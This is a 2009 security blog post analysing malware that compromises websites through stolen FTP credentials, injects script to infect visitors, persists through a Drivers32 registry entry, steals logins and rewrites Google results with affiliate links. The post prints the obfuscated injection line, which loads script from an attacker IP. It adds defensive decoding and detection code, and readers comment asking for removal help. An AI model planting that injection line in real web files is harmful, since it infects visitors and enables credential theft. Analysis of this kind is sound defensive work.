Tuesday, Apr 14, 2009

Malware Manipulating Google SERPs

Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because of the way the attacks propagate, their rate has been increasing exponentially and their volume is now considerable.

The attacks are perpetuated through the compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that they manage also become susceptible to compromise (one component of the malware is its ability to monitor traffic and steal FTP credentials). Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via standard methods, such as poor configuration settings, vulnerable Web apps, and so on.

The malicious script embedded during the compromise is usually placed in other .js or .php files rather than directly in the site's default home page. For example, menu files, login pages, and similar types of content feeds are generally targeted. This placement helps the compromise escape casual observation. The embedded script is as follows:

document.write(unescape('%3CRhSsc5uriptUd%20sPQrCRc%3D5u%2F5u%2F9CR4sW%2E5u24R6M7GS%2EPQ2PQ%2E1Ud95%2FsWj5uqusWeUdrsWy%2EGSjs%3E%3CCR%2FsRhScR6Mript%3E').replace(/R6M|RhS|GS|5u|Ud|PQ|CR|sW/g,""));

Once unescaped and with the junk tokens stripped, the script reduces to <script src=//94.247.2.195/jquery.js></script>. This leads to 94.247.2.195, which resolves to hs.2-195.zlkon.lv, hosted by Datoru Express Serviss, Latvia. Of course, physical host location and whois information may bear little resemblance to the actual attackers.
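The decoding the injected line performs can be reproduced offline, with no browser involved, to recover the tag and the host it loads from. The following is an added example, not code from the ScanSafe post: it applies the same unescape and token-stripping steps to the payload string above as plain string operations, lifts the src targets out of the result, and includes a rough signature for the document.write(unescape(...).replace(...)) wrapper itself. The extraction regex and the signature are my own and have only been checked against this one sample.

```javascript
// Added example: decode the obfuscated injection above without executing it,
// and pull out the remote script URL as an indicator to block and hunt for.

// The payload string and junk-token list exactly as they appear in the
// injected line; the tokens are the alternatives of its replace() regex.
const PAYLOAD =
  '%3CRhSsc5uriptUd%20sPQrCRc%3D5u%2F5u%2F9CR4sW%2E5u24R6M7GS%2EPQ2PQ%2E1Ud95' +
  '%2FsWj5uqusWeUdrsWy%2EGSjs%3E%3CCR%2FsRhScR6Mript%3E';
const JUNK_TOKENS = /R6M|RhS|GS|5u|Ud|PQ|CR|sW/g;

// The full injected line, rebuilt from the pieces above, for the signature test.
const INJECTED_LINE =
  "document.write(unescape('" + PAYLOAD +
  "').replace(/R6M|RhS|GS|5u|Ud|PQ|CR|sW/g,\"\"));";

// Step 1: the same two transformations the malware applies (unescape, then
// strip the junk tokens), but on a plain string: nothing is written into any
// document. unescape() is the legacy function the payload itself relies on;
// for %XX-only input decodeURIComponent() gives the same result.
function decodePayload(encoded, junk) {
  return unescape(encoded).replace(junk, '');
}

// Step 2: lift every <script src=...> target out of the decoded HTML, quoted
// or not, so the host can be blocklisted and searched for across web logs.
function extractScriptSources(html) {
  const re = /<script\b[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/gi;
  const sources = [];
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[1]);
  return sources;
}

// Step 3: a signature for the wrapper itself, which outlives any single IP:
// document.write(unescape('...').replace(/a|b|c/g, "")). Useful when grepping
// the .js and .php files on a web host for the injection described above.
const INJECTION_PATTERN =
  /document\.write\s*\(\s*unescape\s*\(\s*['"][^'"]*['"]\s*\)\s*\.replace\s*\(\s*\/[^\/\n]+\/g\s*,\s*(?:""|'')\s*\)\s*\)/;

function looksLikeObfuscatedInjection(source) {
  return INJECTION_PATTERN.test(source);
}

// Stand-alone run.
const decodedTag = decodePayload(PAYLOAD, JUNK_TOKENS);
console.log('decoded :', decodedTag);
console.log('sources :', extractScriptSources(decodedTag));
console.log('matches :', looksLikeObfuscatedInjection(INJECTED_LINE));
```

Run with node; the same three functions can be pointed at any file pulled from a suspect site, and the signature check is the cheap first pass before spending time decoding by hand.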

When Web surfers visit one of these compromised sites, the embedded script leads to a cocktail of PDF, Flash, and MDAC exploits, which result in the creation of an executable (typically named iexplorer.exe) and two batch files (C:\_.bat and C:\_.t). The batch files move and rename the executable. The malware's final filename and location are random; examples include:

%windir%\flvc.ebi
%windir%\bpagokx.nmy
%windir%\system32\oka.cdq

The file is loaded by registering it as an auxiliary sound driver:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
"aux"="<path and filename of trojan>"

This causes the malware to load whenever any sound-enabled application, which includes every browser, is launched. The malware monitors traffic to and from the browser, which lets it steal usernames, passwords and other sensitive information. When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links replace the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click-through.
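The persistence key makes for a cheap host-level check. The following is an added example, not ScanSafe's code: it parses a Drivers32 key in the text format that reg.exe export writes (the sample below is constructed, not a real dump) and flags any value that does not look like a stock driver or codec module. The set of expected extensions and the rule that stock full-path entries live under system32 are my assumptions based on a Windows XP-era configuration, so treat hits as leads to verify rather than verdicts.

```javascript
// Added example: detect the Drivers32 "aux" hijack described above by parsing
// an exported copy of the key. The sample input is constructed, not a real dump.

const DRIVERS32_KEY =
  'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32';

// Constructed reg-export snippet. reg.exe writes backslashes doubled ("\\").
const SAMPLE_REG = [
  'Windows Registry Editor Version 5.00',
  '',
  '[' + DRIVERS32_KEY + ']',
  '"aux"="C:\\\\WINDOWS\\\\flvc.ebi"',                         // hijacked, as in the article
  '"midi"="wdmaud.drv"',                                       // stock
  '"wave"="wdmaud.drv"',                                       // stock
  '"msacm.imaadpcm"="imaadp32.acm"',                           // stock codec
  '"msacm.l3acm"="C:\\\\WINDOWS\\\\system32\\\\l3codeca.acm"', // stock codec with a full path
].join('\r\n');

// Minimal parser for the REG 5.00 text format: [key] headers followed by
// "name"="string" lines. Other value types (dword:, hex:) are ignored here.
function parseRegExport(text) {
  const keys = {};
  let current = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    const key = line.match(/^\[(.+)\]$/);
    if (key) { current = key[1]; keys[current] = {}; continue; }
    const val = line.match(/^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$/);
    if (val && current) keys[current][val[1]] = val[2].replace(/\\(.)/g, '$1');
  }
  return keys;
}

// Assumption: stock entries are bare module names that Windows resolves from
// its own directories, or (for a few codecs) full paths under system32.
const STOCK_EXTENSIONS = new Set(['drv', 'acm', 'dll']);

// Returns a reason string for a suspicious value, or null for a stock-looking one.
function classifyDriverValue(value) {
  const file = value.split(/[\\/]/).pop();
  const ext = file.includes('.') ? file.split('.').pop().toLowerCase() : '';
  if (!STOCK_EXTENSIONS.has(ext)) return 'unexpected extension .' + ext;
  const hasPath = /[\\/:]/.test(value) || value.startsWith('%');
  if (hasPath && !/\\system32\\[^\\]+$/i.test(value)) return 'module outside system32';
  return null;
}

function findHijackedDrivers(regText) {
  const drivers = parseRegExport(regText)[DRIVERS32_KEY] || {};
  const findings = [];
  for (const [name, value] of Object.entries(drivers)) {
    const reason = classifyDriverValue(value);
    if (reason) findings.push({ name, value, reason });
  }
  return findings;
}

// Stand-alone run against the constructed sample.
for (const f of findHijackedDrivers(SAMPLE_REG)) {
  console.log(`suspicious Drivers32 entry "${f.name}" = ${f.value} (${f.reason})`);
}
```

To run it on a real host, export the key with reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32" drivers32.reg and read the file as UTF-16LE, which is the encoding reg.exe writes. Both of the article's sample names (flvc.ebi, oka.cdq) trip the extension rule; the system32 rule exists so that legitimate codec entries with a full path do not.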

Given the escalation of these attacks, it appears that someone is making a great deal of money.


Reader Comments (5)

It's already blocked regedit from running! So how to?

April 18, 2009 | Unregistered Commenter shaid

What is the best way to get rid of it ?

April 21, 2009 | Unregistered Commenter John

I am trying to find more information about this attack. Some of my customers have been affected. Which virus software can detect it? What is the name of this virus? What is a good removal tool?

April 23, 2009 | Unregistered Commenter Luke

So I take it no one has a viable solution to these f@cktards and this PITA exploit? I've been dealing with it for weeks and cannot seem to thwart their attempts, even though I have changed FTP passcodes, login passcodes and set the files back to their originals. I also work from a Macintosh, so I know it's not my local system that's been compromised.

Thanks.

May 20, 2009 | Unregistered Commenter Mac

They are variants of Daonol:

http://www.sophos.com/security/analyses/viruses-and-spyware/trojdaonolfam.html

http://www.sophos.com/security/analyses/viruses-and-spyware/trojdaonolc.html

June 19, 2009 | Unregistered Commenter OD
